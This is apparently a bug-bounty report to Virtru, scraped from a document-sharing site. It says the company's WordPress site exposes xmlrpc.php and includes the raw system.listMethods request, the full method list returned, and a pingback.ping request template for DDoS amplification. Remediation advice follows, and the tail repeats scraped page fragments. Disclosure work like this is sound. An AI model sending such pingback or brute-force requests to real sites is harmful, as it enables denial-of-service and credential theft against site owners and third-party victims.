Virtru

virtru
Hi Team,
The websitehttps://www.virtru.com/xmlrpc.php has the xmlrpc.php file enabled and

could thus be potentially used for
such an attackagainst other victim hosts. Wordpress that have xmlrpc.php enabled
for pingbacks, trackbacks, etc. can be made
as a part of huge botnet causing a major DDOS.
URL: https://www.virtru.com/xmlrpc.php
In order to determine whether the xmlrpc.php file is enabled or not, using the
Repeater tab in Burp, send the request below.
Request:
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
1/8
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
lets see the response
Response:
HTTP/1.1 200 OK
Date: Wed, 30 Jun 2021 12:23:35 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 4581
Connection: close
Vary: X-Forwarded-Proto,Accept,Accept-Encoding,User-Agent
X-Robots-Tag: noindex, follow
Cache-Control: max-age=0, private, must-revalidate
Expires: Wed, 30 Jun 2021 12:23:35 GMT
X-Powered-By: WP Engine
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
2/8
cf-request-id: 0afe78fefe00000dd07921d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/

beacon/expect-ct"
Server: cloudflare
CF-RAY: 66775dde69540dd0-BOM
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443";

ma=86400, h3=":443"; ma=86400
<?xml version="1.0" encoding="UTF-8"?>

<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>translationproxy.updated_job_status</string></value>
<value><string>translationproxy.test_xmlrpc</string></value>
<value><string>translationproxy.get_languages_list</string></value>
<value><string>wpml.get_languages</string></value>
<value><string>wpml.get_post_trid</string></value>
<value><string>demo.addTwoNumbers</string></value>
<value><string>demo.sayHello</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
<value><string>mt.getTrackbackPings</string></value>
<value><string>mt.supportedTextFilters</string></value>
<value><string>mt.supportedMethods</string></value>
<value><string>mt.setPostCategories</string></value>
<value><string>mt.getPostCategories</string></value>
<value><string>mt.getRecentPostTitles</string></value>
<value><string>mt.getCategoryList</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>metaWeblog.deletePost</string></value>
<value><string>metaWeblog.newMediaObject</string></value>
<value><string>metaWeblog.getCategories</string></value>
<value><string>metaWeblog.getRecentPosts</string></value>
<value><string>metaWeblog.getPost</string></value>
<value><string>metaWeblog.editPost</string></value>
3/8
<value><string>metaWeblog.newPost</string></value>
<value><string>blogger.deletePost</string></value>
<value><string>blogger.editPost</string></value>
<value><string>blogger.newPost</string></value>
<value><string>blogger.getRecentPosts</string></value>
<value><string>blogger.getPost</string></value>
<value><string>blogger.getUserInfo</string></value>
<value><string>blogger.getUsersBlogs</string></value>
<value><string>wp.restoreRevision</string></value>
<value><string>wp.getRevisions</string></value>
<value><string>wp.getPostTypes</string></value>
<value><string>wp.getPostType</string></value>
<value><string>wp.getPostFormats</string></value>
<value><string>wp.getMediaLibrary</string></value>
<value><string>wp.getMediaItem</string></value>
<value><string>wp.getCommentStatusList</string></value>
<value><string>wp.newComment</string></value>
<value><string>wp.editComment</string></value>
<value><string>wp.deleteComment</string></value>
<value><string>wp.getComments</string></value>
<value><string>wp.getComment</string></value>
<value><string>wp.setOptions</string></value>
<value><string>wp.getOptions</string></value>
<value><string>wp.getPageTemplates</string></value>
<value><string>wp.getPageStatusList</string></value>
<value><string>wp.getPostStatusList</string></value>
<value><string>wp.getCommentCount</string></value>
<value><string>wp.deleteFile</string></value>
<value><string>wp.uploadFile</string></value>
<value><string>wp.suggestCategories</string></value>
<value><string>wp.deleteCategory</string></value>
<value><string>wp.newCategory</string></value>
<value><string>wp.getTags</string></value>
<value><string>wp.getCategories</string></value>
<value><string>wp.getAuthors</string></value>
<value><string>wp.getPageList</string></value>
<value><string>wp.editPage</string></value>
<value><string>wp.deletePage</string></value>
<value><string>wp.newPage</string></value>
<value><string>wp.getPages</string></value>
<value><string>wp.getPage</string></value>
<value><string>wp.editProfile</string></value>
<value><string>wp.getProfile</string></value>
<value><string>wp.getUsers</string></value>
<value><string>wp.getUser</string></value>
<value><string>wp.getTaxonomies</string></value>
<value><string>wp.getTaxonomy</string></value>
4/8
<value><string>wp.getTerms</string></value>
<value><string>wp.getTerm</string></value>
<value><string>wp.deleteTerm</string></value>
<value><string>wp.editTerm</string></value>
<value><string>wp.newTerm</string></value>
<value><string>wp.getPosts</string></value>
<value><string>wp.getPost</string></value>
<value><string>wp.deletePost</string></value>
<value><string>wp.editPost</string></value>
<value><string>wp.newPost</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array>
</value>
</param>
</params>
</methodResponse>
Notice that a successful response is received showing that the xmlrpc.php file is
enabled.Now, considering the domain
https://www.virtru.com, the xmlrpc.php file discussed above could potentially be
abused to cause a DDOS attack against a victim host. This is achieved by simply
sending a request that looks like below.
5/8
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
<methodCall>
<methodName>pingback.ping</methodName>
<params>
code
<param>
<value><string>http://<YOUR SERVER ></string></value>
</param>
<param>
<value><string>https://www.virtru.com//string></value>
</param>
</params>
</methodCall>
Remediation:
If the XMLRPC.php file is not being used, it should be disabled and removed
completely to avoid any potential risks. Otherwise, it
should at the very least be blocked from external access.
Reference :
1) Here is the explanation of xmlrpc file enable brute force attack- https://
6/8
blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-
xmlrpc.html
2) The explanation for xmlrpc.php file will enable dos attack- https://blog.sucuri.net/
2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-
attack.html
Thanks, waiting for your response.
Impact
1)This can be automated from multiple hosts and be used to cause a mass DDOS
attack on the victim.
2) This method is also used for brute force attacks to stealing the admin credentials
and other important credentials
POC images
virtru.com/xmlrpc.php
7/8
8/8

Virtru

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Virtru

Uploaded by

Copyright:

Available Formats

virtru

The websitehttps://www.virtru.com/xmlrpc.php has the xmlrpc.php file enabled and

POST /xmlrpc.php HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept-Encoding: gzip, deflate

lets see the response

Date: Wed, 30 Jun 2021 12:23:35 GMT

Content-Type: text/xml; charset=UTF-8

X-Robots-Tag: noindex, follow

Cache-Control: max-age=0, private, must-revalidate

Expires: Wed, 30 Jun 2021 12:23:35 GMT

Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/

alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443";

<?xml version="1.0" encoding="UTF-8"?>

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept-Encoding: gzip, deflate

Thanks, waiting for your response.

You might also like